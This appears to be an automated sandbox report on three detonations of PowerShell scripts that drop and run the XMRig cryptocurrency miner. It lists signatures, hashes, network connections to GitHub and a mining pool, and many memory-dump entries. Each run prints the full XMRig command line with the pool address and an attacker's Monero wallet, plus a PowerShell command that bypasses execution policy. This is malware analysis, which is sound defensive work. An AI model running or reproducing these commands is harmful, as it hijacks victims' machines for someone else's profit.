memory/3268-110-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-111-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-112-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-113-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-114-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-115-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-116-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-117-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-118-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:57

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

memory/2792-0-0x00007FF800FD3000-0x00007FF800FD5000-memory.dmp

memory/2792-6-0x000002ACC6B40000-0x000002ACC6B62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1txqsdxj.bmw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2792-11-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/2792-12-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/2792-14-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/2792-15-0x000002ACC6DB0000-0x000002ACC6DC2000-memory.dmp

memory/2792-16-0x000002ACC6B20000-0x000002ACC6B2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1052-47-0x000001EBB3B50000-0x000001EBB3B70000-memory.dmp

memory/1052-48-0x000001EBB5350000-0x000001EBB5370000-memory.dmp

memory/1052-49-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/2792-50-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/2792-51-0x00007FF800FD3000-0x00007FF800FD5000-memory.dmp

memory/1052-52-0x000001EBB5370000-0x000001EBB5390000-memory.dmp

memory/1052-53-0x000001EBB5390000-0x000001EBB53B0000-memory.dmp

memory/1052-54-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/2792-55-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/1052-56-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-58-0x000001EBB5370000-0x000001EBB5390000-memory.dmp

memory/1052-57-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-59-0x000001EBB5390000-0x000001EBB53B0000-memory.dmp

memory/1052-60-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-61-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-62-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-63-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-64-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-65-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-66-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-67-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-68-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-69-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-70-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-71-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-72-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-73-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-74-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-75-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-76-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-77-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-78-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-79-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-80-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-81-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-82-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-83-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-84-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-85-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-86-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-87-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-88-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-89-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-90-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-91-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-92-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-93-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-94-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-95-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-96-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-97-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-98-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-99-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-100-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-101-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-102-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-103-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-104-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-105-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-106-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-107-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-108-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-109-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-110-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-111-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-112-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-113-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-114-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-115-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-116-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-117-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-118-0x00007FF788660000-0x00007FF789293000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 01:00

Platform

win11-20240508-en

Max time kernel

1798s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2660-0-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_44v4i4a0.ybe.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2660-9-0x000001C17B5B0000-0x000001C17B5D2000-memory.dmp

memory/2660-10-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2660-11-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2660-12-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2660-14-0x000001C17B650000-0x000001C17B662000-memory.dmp

memory/2660-15-0x000001C17B640000-0x000001C17B64A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2424-46-0x00000273E1EC0000-0x00000273E1EE0000-memory.dmp

memory/2424-47-0x00000273E1F10000-0x00000273E1F30000-memory.dmp

memory/2424-48-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-49-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-51-0x00000273E3800000-0x00000273E3820000-memory.dmp

memory/2424-52-0x00000273E1F30000-0x00000273E1F50000-memory.dmp

memory/2660-50-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2660-53-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

memory/2424-54-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-55-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-56-0x00000273E3800000-0x00000273E3820000-memory.dmp

memory/2424-57-0x00000273E1F30000-0x00000273E1F50000-memory.dmp

memory/2424-58-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-59-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-60-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-61-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-62-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-63-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-64-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-65-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-66-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-67-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-68-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-69-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-70-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-71-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-72-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-73-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-74-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-75-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-76-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-77-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-78-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-79-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-80-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-81-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-82-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-83-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-84-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-85-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-86-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-87-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-88-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-89-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-90-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-91-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-92-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-93-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-94-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-95-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-96-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-97-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-98-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-99-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-100-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-101-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-102-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-103-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-104-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-105-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-106-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-107-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-108-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-109-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-110-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-111-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-112-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-113-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-114-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-115-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-116-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:47

Platform

win11-20240419-en

Max time kernel

1800s

Max time network

1755s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4512-0-0x00007FFE572F3000-0x00007FFE572F5000-memory.dmp

memory/4512-1-0x0000020F3CBC0000-0x0000020F3CBE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tqyffnzl.j0v.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4512-10-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/4512-11-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/4512-12-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/4512-14-0x0000020F3CED0000-0x0000020F3CEE2000-memory.dmp

memory/4512-15-0x0000020F3CEB0000-0x0000020F3CEBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3604-46-0x000001FF88C80000-0x000001FF88CA0000-memory.dmp

memory/3604-47-0x000001FF88DF0000-0x000001FF88E10000-memory.dmp

memory/3604-48-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/4512-49-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/3604-51-0x000001FF88E10000-0x000001FF88E30000-memory.dmp

memory/4512-50-0x00007FFE572F3000-0x00007FFE572F5000-memory.dmp

memory/3604-52-0x000001FF88E30000-0x000001FF88E50000-memory.dmp

memory/3604-53-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-54-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-56-0x000001FF88E10000-0x000001FF88E30000-memory.dmp

memory/3604-55-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-57-0x000001FF88E30000-0x000001FF88E50000-memory.dmp

memory/3604-58-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-59-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-60-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-61-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-62-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-63-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-64-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-65-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-66-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-67-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-68-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-69-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-70-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-71-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-72-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-73-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-74-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-75-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-76-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-77-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-78-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-79-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-80-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-81-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-82-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-83-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-84-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-85-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-86-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-87-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-88-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-89-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-90-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-91-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-92-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-93-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-94-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-95-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-96-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-97-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-98-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-99-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-100-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-101-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-102-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-103-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-104-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-105-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-106-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-107-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-108-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-109-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

